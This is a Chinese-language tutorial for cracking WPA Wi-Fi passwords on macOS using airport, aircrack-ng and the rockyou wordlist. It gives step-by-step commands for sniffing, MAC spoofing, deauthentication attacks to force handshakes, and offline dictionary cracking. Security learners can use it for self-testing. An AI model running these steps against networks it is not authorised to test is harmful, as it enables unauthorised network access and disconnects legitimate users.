实验环境 macOS Catalina 10.15.7
参考链接:https://mba811.gitbooks.io/web-study/content/wlaq/gj/w1.html
参考链接:https://osxdaily.com/2007/01/18/airport-the-little-known-command-line-wireless-utility/
参考链接:https://gwliang.com/2020/01/24/wifi-cracking/#appendix.zh.md
Kali 实验步骤文档下载链接
链接: https://pan.baidu.com/s/1lsYFPKTl4SY9Ksltl9OShw 提取码: tx86 复制这段内容后打开百度网盘手机App,操作更方便哦
安装
Download and install XCode
1
xcode-select --install
Download and install MacPorts
Update Mac Ports
1
sudo port -v selfupdate
Install AirCrack
1
brew install aircrack-ng
create a symbolic link to the airport command
1
cd /usr/sbin
1
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport
aircrack - ng
Aircrack-ng是一个包含了多款工具的无线攻击审计套装,其中包含的工具在无线破解过程中都会用到。
在目标AP已有合法客户端连接的情况下,可以通过airodump-ng侦听数据包,然后用aireplay-ng的deauth强制合法客户端掉线,掉线后客户端会尝试重新连接AP,此时会产生握手包。如果成功抓取到该握手包,则可以用字典进行本地离线破解。使用这种方法进行攻击的前提有两个:一是必须处在目标AP的信号范围内;二是已有合法客户端连接该AP。
在客户端开启无线,但是没有与目标AP连接的情况下,可以通过airbase-ng伪造目标AP来欺骗客户端与其连接,这时也会产生握手包,通过这个握手包,同样可以实现破解目标AP无线密码以及入侵客户端。
无线网卡工作模式
- 管理模式(Managed)
Managed模式用于无线STA直接与无线AP进行接入连接。 - 主模式(Master)
Master模式允许无线网卡使用特制的驱动程序和软件工作,作为其他设备的无线AP。例如,无线路由器就是工作在Master模式下。对于普通的PC机来说,如果有合适的硬件也可以变成一台无线AP。 - Ad_hoc模式
当用户的网络由互相直连的设备组成时,就使用Ad_hoc模式。在这个模式中,各设备之间采用对等网络的方式进行连接,无线通信双方共同承担无线AP的职责。 - 监听模式(Monitor)
Monitor模式主要用于监控无线网络内部的流量,用于检测网络和排错。如果要捕获无线数据包,用户的无线网卡和配套的驱动必须支持监听模式。
正常情况下,网卡都工作在管理模式,将要发送的数据包发往连接在一起的所有主机,数据包中包含着应该接收数据包主机的正确地址,只有与数据包中目标地址一致的主机才能接收。
但当处于监听模式时,无论数据包中的目标地址是什么,主机都将接收,而且网络监听不容易被发现。
因为运行网络监听的主机只是在被动的接收局域网中传输的信息,不主动与其他主机交换信息,也没有修改在网络中传输的数据包。
airport Wireless Tool使用
显示基本信息
1 | airport -I |
扫描周边无线网络
1 | airport -s |
禁用airport,关闭wifi
1 | networksetup -setairportpower airport off |
设备名称可以是airport,EN0,EN1等,因Mac硬件和OS X的版本,因此,可能需要指定设备端口,而不是’airport’,例如EN1 EN0或:
1 | networksetup -setairportpower en0 off |
检查端口(以en0为例子,可以替换成其他的)
1 | networksetup -getairportpower en0 |
启用端口,打开wifi
1 | networksetup -setairportpower en0 on |
扫描
1 | airport en0 scan |
可以使用grep进行过滤,如
1 | airport en0 scan |grep WEP |
监听
1 | sudo airport en0 sniff 6 |
en0是所使用网卡的名称,sniff表示模式,6表示信道
Ctrl c
停止监听
Wireshark分析包
根据Mac地址查看厂商
http://www.atoolbox.net/Tool.php?Id=808
http://www.metools.info/other/o67.html
https://mac.bmcx.com/d0:76:e7:ef:c3:41__mac/
在漏洞网站查看公开的漏洞信息
Routerpwn.com
MAC地址伪装
1 | sudo ifconfig en0 lladdr 00:00:00:00:00:00:01 |
Deauth攻击
https://github.com/0x0XDev/JamWiFi
Jamwifi下载:
链接: https://pan.baidu.com/s/180kUZjXXf6PS8C8ZtB2d6Q 提取码: fcu4 复制这段内容后打开百度网盘手机App,操作更方便哦
抓包
无线诊断工具
幸运的是,OSX 配备了一套无线诊断工具。 要打开它们,请在按住键盘上 option 键的同时,点击菜单栏中的 Wi-Fi 图标。 然后选择“打开无线诊断…”
测定目标网络信道
打开无线诊断程序,单击窗口 > 扫描。 找到目标网络,记录下其信道和宽度。
抓取一个 4-way handshake
- 在无线诊断程序打开的情况下,点击菜单栏中的窗口 > 嗅探器。选择你在上一步中找到的信道和宽度。
- 现在,你需要等待有设备连接到目标网络。如果你正在自己的网络上测试(使用者应当只在自己的网络上进行测试),将任意一个无线设备重新连接就可以抓取 handshake。
- 当你感觉已经成功抓取 handshake 时,点击停止。
- 根据你的操作系统版本,抓取的
.wcap
文件将被保存到桌面或/var/tmp/
。 - 将抓取的文件上传到 https://hashcat.net/cap2hccapx/ 就可以将其转换为
.hccapx
文件。 如果你成功的抓到了 handshake ,站点将开始下载一个.hccapx
文件。 否则将不会提示下载。
破解
1 | aircrack-ng -w /Users/gryffinbit/Downloads/rockyou.txt /tmp/airportSniffbW3DzV.cap |
-w表示使用字典,/Users/gryffinbit/Downloads/rockyou.txt是字典所在的路径,airportSniffbW3DzV.cap是刚才监听生成的文件。执行后会分析这个文件,最后会询问你得目标网络是哪个。
1 | aircrack-ng -w dic.txt -M 100 -f 80 -1 -a 2 -b **:**:**:**:**:** /tmp/airportSniffbW3DzV.cap |
1 | aircrack-ng -w /Users/gryffinbit/Documents/攻击包/naive-hashcat/dicts/rockyou.txt -M 100 -f 80 -1 -a 2 -b 40:B0:76:53:31:F8 /Users/gryffinbit/Desktop/Gryffinbit’s\ MacBook\ Pro_ch11_2021-05-04_10.43.18.435.pcap |
- -w 指定字典文件
- -M 指定最大IVs,根据提示可以适当调大次参数
- -f 暴力破解因子,默认2,也可适当调大
- -a 加密类型,1:WEP, 2:WPA-PSK
- -b BSSID,刚刚纪录目标Wi-Fi的Mac地址
- 后面紧跟之前记录的捕获数据的存储地址即可。
更多参数说明可以通过aircrack-ng --help
查看。
后记
kali
airmon-ng是Aircrack-ng中的一个工具,主要用来设置监听模式。在破解无线网络时,通常都是用该工具将无线网卡设置为监听模式。语法格式如下:
1 airmon-ng <start|stop> <interface> [channel]
1 airmon-ng <check> [kill]参数含义:
参数 说明 start 启动监听模式 stop 停止监听模式 interface 指定设置监听模式的接口 channel 指定无线网络的信道 check 列出所有可能干扰无线网卡的程序。 kill 杀死所有可能干扰无线网卡的程序。